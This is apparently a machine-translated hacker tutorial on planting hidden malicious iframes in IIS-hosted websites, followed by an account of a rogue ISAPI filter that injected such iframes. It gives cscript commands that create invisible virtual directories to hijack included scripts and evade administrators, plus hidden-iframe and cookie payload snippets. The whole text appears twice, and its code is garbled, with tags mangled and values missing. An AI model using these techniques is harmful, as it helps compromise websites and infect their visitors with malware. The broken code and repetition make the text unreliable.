There are also some foreign machines that have obtained all the permissions and don’t know how he did it. He didn’t let him write anything. He finally wrote a file and then changed it back after a while. It really makes people feel very good!#$%%#%^#%^, it is said that there is a kind of software that can monitor important files. Once the changes are found, it will be restored. For example, if it monitors the web directory, we cannot change any content of his website. However, after reading a lot of articles about Dazhe, I also studied it a little, and finally figured out something. I can modify other people's pages and the often-telled consequences of hanging horses, etc., without writing any documents, I will introduce to you here that those administrators who only know how to be diligent should also be careful!
As we all know, when we browse the website, the server processes the information into an Html method and returns it to us. What we want to achieve is that when customers visit, they can change the content of their browsers, so that they can secretly execute our things such as *s, etc. The more common way is to introduce Frame, set attributes to make it invisible on the page, or use JavaScript to jump without fear of death. More advanced ones will use Html elements in the original code such as script tags or frame tags, and then tamper with other files or pages introduced in these tags, or change some database content to be displayed on the homepage, such as modifying announcements in the database to achieve hang-up. However, these all require adding things to the original code of the server or modifying the content of the website. Whether it is cross-site or directly modifying the original code, this is extremely easy to discover. When you meet a diligent administrator, your things will not be on the server for long! Also, if some pages are not written, we are also depressed, so it is necessary to find a more hidden and safer way to solve the above problems!
Let’s go to the Iis manager first! Select a page to see its properties as shown in Figure 1. Haha, there is a resource redirection! If we redirect this page to a page we have already controlled, then when the browser requests this page, it will turn to visit the page we defined. What if this page is a web page *? Obviously, visitors will be hung up! This is a very simple way, you just need to change the page's redirection in IIs! Anyone who has access to the IIS manager can do it easily! But there is still a problem like this! If the administrator finds that the page is always redirected, and when checking the website files and using backup and other means to restore the problem still fails to solve the problem, he will definitely go to IIS to read it! If you accidentally see the properties of the main page, you will find something wrong and you can change it back!
Then let's continue to see if there is a more hidden way! With the help of the previous method of the horse-hanging person, since the main page is easy to be discovered, then go and check out the Html tag in the main page! It will be easier if you find that other pages are called! For example, there is a tag like this in the home page:
<script src=include/></script>
Then we have a way, and modify the include/ attribute! As shown in Figure 2, go to a certain page of ours. Of course, the content must be explained in the script tag, such as:
("<8))e style=display:none; src= width=0 height=0></8))e>");
This will introduce our page! Of course, it is best to implement its JS functions first! That's enough to be hidden! Now the administrator will find that the homepage has not changed, the properties of the homepage in IIs have not changed, and even any www files on the host have not been modified, he will be very depressed! hehe! If he just restored the previous website backup and restored it, he would not be able to change the page! There are so many IIs files, he can't look at the attributes one by one! By the way, I would like to ask the question that the file you choose to redirect the past must be explained by the html tag, otherwise it will be ineffective! For example, it is useless for you to redirect to our * page, because the * page is not parsed as Html, but is sent to the img tag as an image! The tags I think of can be used are script and frame. As for Css, I think it can be used, but I haven't found the use method yet! I don’t know if I analyzed it correctly, and everyone is welcome to give me advice!
Let's continue! Suppose that if your administrator is powerful or diligent enough and he finds out that you have done something on it, he will restore him from IIs! Our dream is shattered again! Is there a more hidden way? Can't even find the administrator in IIs? The answer is yes! Everyone must remember the IIS configuration vulnerability a long time ago, which can create an invisible virtual directory and then create a backdoor inside! We can also borrow and use it! Let’s take a look at the principle of IIS configuration vulnerability. It means to create a virtual directory without a physical directory, so that it will be invisible in IIs, and then you can do some small actions in this directory! Here we first create an invisible virtual directory. If the js file under the include folder is called in the home page, we will create the include directory! This can be achieved with the help of IIS scripts, where the script is in the IIs installation directory such as C:InetpubAdminScripts. It is a script that controls the behavior of IIS. The commands we use are as follows:
cscript Create W3SVC/1/Root/www/include "IIsWebVirtualDir"
In this way, a virtual directory that is invisible in IIs will be created, and it will not be displayed because there is no path set! Then create a virtual directory called "Haha! You can use special characters such as . when you actually create a virtual directory:
cscript Create W3SVC/1/Root/www/include/ "IIsWebVirtualDir"
This way there is a virtual directory of include/! What came to mind? Is it consistent with the name of the file called on the homepage? Let's keep going!
cscript set W3SVC/1/Root/www/include//httpredirect "/"
This is to change the redirection feature of virtual directories, as shown in Figure 3. Note that W3SVC/1/Root/www/ represents the www virtual directory of the first web server under IIs. If you are not clear about it, you can use the enum parameter to query the website you need to change. For other operations, you can open the script to help you! After this operation, the virtual directory redirection feature is set. Now try to call include/ in the homepage. Are you guessing whether the content returned or our content? The answer is, as shown in Figure 4, and the physical files still exist! This may be the feature of IIS! He first handles the user's request, and the virtual directory takes precedence over the physical files! Then let’s go to IIS to see if there is any include virtual directory! As shown in Figure 5, no! hehe! In this way, we will successfully spare the permission restrictions and administrator detection! Hang our *s on the other party's website, and it will be difficult for him to clear our *s unless the other party re-dos IIs or deletes our hidden virtual directory!
The article is very simple. The key is the commands of IIS scripts and some understanding of IIs. This method of hanging horses is suitable for hanging horses after obtaining administrator permissions. It is still very useful for dealing with those who are just diligent administrators! If you find any problems on the website in the future, remember to use this script to check if there is any problem! Or just back up the IIS settings too! When you encounter problems, restore the settings of IIs, haha!
2. The entire server is hanged. The code of hanged on the web page cannot be found in the source file.
A server, almost all websites open web pages, and even HTML web pages appear.
<8))e src="http://xxxdfsfd/" height=0 width=0></8))e>
This style of code is usually found on the head. Some antivirus software will be opened to report the virus.
Open HTML or ASP PHP page. This code cannot be found in the source code.
At first I suspected that it was JS. I searched for a long time but still couldn't find it. Even the newly created HTML page will have this code~
Carefully search for the problem, the problem should be opened on IIS, restarted once, right-click the property on the main IIS, ISAPI, I found an ISAPI extension that I have never seen before
The path is: c: ISAP loading normally, green state
Cancel Restart IIS All codes disappear
The add-in contains three files:
Contents are:
Cookie=GAG5=ABCDEFG
Redirector=C:
Contents are:
<body>
<8))e src="/" height=0 width=0></8))e>
<script language="javascript">
<!--
var expires = new Date();
(() + 5 * 24* 60 * 60 * 1000);
="GAG5=ABCDEFG;expires="+();
-->
</script>
</body>
As we all know, when we browse the website, the server processes the information into an Html method and returns it to us. What we want to achieve is that when customers visit, they can change the content of their browsers, so that they can secretly execute our things such as *s, etc. The more common way is to introduce Frame, set attributes to make it invisible on the page, or use JavaScript to jump without fear of death. More advanced ones will use Html elements in the original code such as script tags or frame tags, and then tamper with other files or pages introduced in these tags, or change some database content to be displayed on the homepage, such as modifying announcements in the database to achieve hang-up. However, these all require adding things to the original code of the server or modifying the content of the website. Whether it is cross-site or directly modifying the original code, this is extremely easy to discover. When you meet a diligent administrator, your things will not be on the server for long! Also, if some pages are not written, we are also depressed, so it is necessary to find a more hidden and safer way to solve the above problems!
Let’s go to the Iis manager first! Select a page to see its properties as shown in Figure 1. Haha, there is a resource redirection! If we redirect this page to a page we have already controlled, then when the browser requests this page, it will turn to visit the page we defined. What if this page is a web page *? Obviously, visitors will be hung up! This is a very simple way, you just need to change the page's redirection in IIs! Anyone who has access to the IIS manager can do it easily! But there is still a problem like this! If the administrator finds that the page is always redirected, and when checking the website files and using backup and other means to restore the problem still fails to solve the problem, he will definitely go to IIS to read it! If you accidentally see the properties of the main page, you will find something wrong and you can change it back!
Then let's continue to see if there is a more hidden way! With the help of the previous method of the horse-hanging person, since the main page is easy to be discovered, then go and check out the Html tag in the main page! It will be easier if you find that other pages are called! For example, there is a tag like this in the home page:
<script src=include/></script>
Then we have a way, and modify the include/ attribute! As shown in Figure 2, go to a certain page of ours. Of course, the content must be explained in the script tag, such as:
("<8))e style=display:none; src= width=0 height=0></8))e>");
This will introduce our page! Of course, it is best to implement its JS functions first! That's enough to be hidden! Now the administrator will find that the homepage has not changed, the properties of the homepage in IIs have not changed, and even any www files on the host have not been modified, he will be very depressed! hehe! If he just restored the previous website backup and restored it, he would not be able to change the page! There are so many IIs files, he can't look at the attributes one by one! By the way, I would like to ask the question that the file you choose to redirect the past must be explained by the html tag, otherwise it will be ineffective! For example, it is useless for you to redirect to our * page, because the * page is not parsed as Html, but is sent to the img tag as an image! The tags I think of can be used are script and frame. As for Css, I think it can be used, but I haven't found the use method yet! I don’t know if I analyzed it correctly, and everyone is welcome to give me advice!
Let's continue! Suppose that if your administrator is powerful or diligent enough and he finds out that you have done something on it, he will restore him from IIs! Our dream is shattered again! Is there a more hidden way? Can't even find the administrator in IIs? The answer is yes! Everyone must remember the IIS configuration vulnerability a long time ago, which can create an invisible virtual directory and then create a backdoor inside! We can also borrow and use it! Let’s take a look at the principle of IIS configuration vulnerability. It means to create a virtual directory without a physical directory, so that it will be invisible in IIs, and then you can do some small actions in this directory! Here we first create an invisible virtual directory. If the js file under the include folder is called in the home page, we will create the include directory! This can be achieved with the help of IIS scripts, where the script is in the IIs installation directory such as C:InetpubAdminScripts. It is a script that controls the behavior of IIS. The commands we use are as follows:
cscript Create W3SVC/1/Root/www/include "IIsWebVirtualDir"
In this way, a virtual directory that is invisible in IIs will be created, and it will not be displayed because there is no path set! Then create a virtual directory called "Haha! You can use special characters such as . when you actually create a virtual directory:
cscript Create W3SVC/1/Root/www/include/ "IIsWebVirtualDir"
This way there is a virtual directory of include/! What came to mind? Is it consistent with the name of the file called on the homepage? Let's keep going!
cscript set W3SVC/1/Root/www/include//httpredirect "/"
This is to change the redirection feature of virtual directories, as shown in Figure 3. Note that W3SVC/1/Root/www/ represents the www virtual directory of the first web server under IIs. If you are not clear about it, you can use the enum parameter to query the website you need to change. For other operations, you can open the script to help you! After this operation, the virtual directory redirection feature is set. Now try to call include/ in the homepage. Are you guessing whether the content returned or our content? The answer is, as shown in Figure 4, and the physical files still exist! This may be the feature of IIS! He first handles the user's request, and the virtual directory takes precedence over the physical files! Then let’s go to IIS to see if there is any include virtual directory! As shown in Figure 5, no! hehe! In this way, we will successfully spare the permission restrictions and administrator detection! Hang our *s on the other party's website, and it will be difficult for him to clear our *s unless the other party re-dos IIs or deletes our hidden virtual directory!
The article is very simple. The key is the commands of IIS scripts and some understanding of IIs. This method of hanging horses is suitable for hanging horses after obtaining administrator permissions. It is still very useful for dealing with those who are just diligent administrators! If you find any problems on the website in the future, remember to use this script to check if there is any problem! Or just back up the IIS settings too! When you encounter problems, restore the settings of IIs, haha!
2. The entire server is hanged. The code of hanged on the web page cannot be found in the source file.
A server, almost all websites open web pages, and even HTML web pages appear.
<8))e src="http://xxxdfsfd/" height=0 width=0></8))e>
This style of code is usually found on the head. Some antivirus software will be opened to report the virus.
Open HTML or ASP PHP page. This code cannot be found in the source code.
At first I suspected that it was JS. I searched for a long time but still couldn't find it. Even the newly created HTML page will have this code~
Carefully search for the problem, the problem should be opened on IIS, restarted once, right-click the property on the main IIS, ISAPI, I found an ISAPI extension that I have never seen before
The path is: c: ISAP loading normally, green state
Cancel Restart IIS All codes disappear
The add-in contains three files:
Contents are:
Cookie=GAG5=ABCDEFG
Redirector=C:
Contents are:
<body>
<8))e src="/" height=0 width=0></8))e>
<script language="javascript">
<!--
var expires = new Date();
(() + 5 * 24* 60 * 60 * 1000);
="GAG5=ABCDEFG;expires="+();
-->
</script>
</body>